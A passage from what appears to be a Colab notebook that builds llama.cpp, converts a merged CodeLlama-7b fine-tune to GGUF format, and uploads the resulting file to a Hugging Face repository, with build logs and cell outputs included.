  Building wheel for llama-cpp-python (pyproject.toml) ... [?25l[?25hdone
  Created wheel for llama-cpp-python: filename=llama_cpp_python-0.3.9-cp311-cp311-linux_x86_64.whl size=4067750 sha256=cadc4a447a8ede5a5594e

## Build llama.cpp

In [None]:
# -p keeps a re-run from failing when the build directory already exists.
!cd llama.cpp && mkdir -p build
!cd llama.cpp/build && cmake .. && make -j$(nproc)

-- The C compiler identification is GNU 11.4.0
-- The CXX compiler identification is GNU 11.4.0
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: /usr/bin/cc - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Check for working CXX compiler: /usr/bin/c++ - skipped
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Found Git: /usr/bin/git (found version "2.34.1")
-- Performing Test CMAKE_HAVE_LIBC_PTHREAD
-- Performing Test CMAKE_HAVE_LIBC_PTHREAD - Success
-- Found Threads: TRUE
-- CMAKE_SYSTEM_PROCESSOR: x86_64
-- GGML_SYSTEM_ARCH: x86
-- Including CPU backend
-- Found OpenMP_C: -fopenmp (found version "4.5")
-- Found OpenMP_CXX: -fopenmp (found version "4.5")
-- Found OpenMP: TRUE (found version "4.5")
-- x86 detected
-- Adding CPU backend variant ggml-cpu: -march=native 
-- Found CURL: /usr/lib

## Convert the merged model to GGUF and declare the upload function

In [None]:
from transformers import AutoTokenizer
from huggingface_hub import HfApi, create_repo
import subprocess
import os
import sys

# The merge step writes the model to Google Drive. A local copy under
# /content exists only when it was copied there by hand, so use the local
# folder when it holds a model (config.json present) and fall back to the
# Drive folder otherwise. Pointing the converter at an empty local folder
# would make the conversion fail.
local_merged_path = "/content/merged_model_fp16"
drive_merged_path = "/content/drive/MyDrive/finetune_lora/merged_model_fp16"
if os.path.isfile(os.path.join(local_merged_path, "config.json")):
    merged_model_path = local_merged_path
else:
    merged_model_path = drive_merged_path
base_model_id = "codellama/CodeLlama-7b-hf"

# The converter needs the tokenizer files next to the model weights.
print("Saving tokenizer...")
tokenizer = AutoTokenizer.from_pretrained(base_model_id)
tokenizer.save_pretrained(merged_model_path)

print("Converting to GGUF format...")
gguf_output_path = "/content/merged_model.gguf"

convert_script = "/content/llama.cpp/convert_hf_to_gguf.py"
convert_command = [
    # Run the script with the kernel's interpreter so it sees the packages
    # installed in this notebook.
    sys.executable, convert_script,
    merged_model_path,
    "--outfile", gguf_output_path,
    "--outtype", "f16"
]

try:
    result = subprocess.run(convert_command, capture_output=True, text=True, check=True)
    print("Conversion successful!")
    print(result.stdout)
except subprocess.CalledProcessError as e:
    # A failed conversion is reported but does not stop the notebook; the
    # upload cell checks that the output file exists.
    print(f"Conversion failed: {e}")
    print(f"Error output: {e.stderr}")

def upload_to_huggingface(gguf_file_path, repo_name, hf_token):
    """Create the Hub repository if needed and upload one GGUF file to it.

    Errors are reported with ``print`` and never raised; when the repository
    cannot be created the upload is skipped.

    Args:
        gguf_file_path: Local path of the file to upload.
        repo_name: Target repository id, e.g. "user/repo".
        hf_token: Token passed to the repository creation and upload calls.

    Returns:
        None.
    """
    hub_client = HfApi(token=hf_token)

    # Step 1: make sure the target repository exists.
    try:
        create_repo(repo_name, token=hf_token, exist_ok=True)
        print(f"Repository {repo_name} created/confirmed")
    except Exception as repo_error:
        print(f"Error creating repo: {repo_error}")
        return

    # Step 2: push the file; it is always stored as "model.gguf" in the repo.
    upload_arguments = dict(
        path_or_fileobj=gguf_file_path,
        path_in_repo="model.gguf",
        repo_id=repo_name,
        token=hf_token,
    )
    try:
        hub_client.upload_file(**upload_arguments)
        print(f"Successfully uploaded to https://huggingface.co/{repo_name}")
    except Exception as upload_error:
        print(f"Upload failed: {upload_error}")

Saving tokenizer...


The secret `HF_TOKEN` does not exist in your Colab secrets.
To authenticate with the Hugging Face Hub, create a token in your settings tab (https://huggingface.co/settings/tokens), set it as secret in your Google Colab and restart your session.
You will be able to reuse this secret in all of your notebooks.
Please note that authentication is recommended but still optional to access public models or datasets.


tokenizer_config.json:   0%|          | 0.00/749 [00:00<?, ?B/s]

tokenizer.model:   0%|          | 0.00/500k [00:00<?, ?B/s]

tokenizer.json:   0%|          | 0.00/1.84M [00:00<?, ?B/s]

special_tokens_map.json:   0%|          | 0.00/411 [00:00<?, ?B/s]

Converting to GGUF format...
Conversion successful!



## Run code

In [None]:
if __name__ == "__main__":
    # Do not paste a token into the notebook: it would be saved and shared
    # with the file. Use the HF_TOKEN environment variable when it is set;
    # otherwise pass None so huggingface_hub falls back to the credentials
    # stored by notebook_login() in STEP 1.
    HF_TOKEN = os.environ.get("HF_TOKEN") or None

    # Change to your data repo's name. ###########
    # Example: hira-wz/codellama-custom-rules-gguf
    REPO_NAME = "hira-wz/codellama-custom-gguf" ##
    ##############################################

    # Upload GGUF file
    if os.path.exists(gguf_output_path):
        upload_to_huggingface(gguf_output_path, REPO_NAME, HF_TOKEN)
    else:
        print("GGUF file not found. Please check the conversion step.")

Repository hira-wz/codellama-custom-gguf created/confirmed


merged_model.gguf:   0%|          | 0.00/13.5G [00:00<?, ?B/s]

Successfully uploaded to https://huggingface.co/hira-wz/codellama-custom-gguf
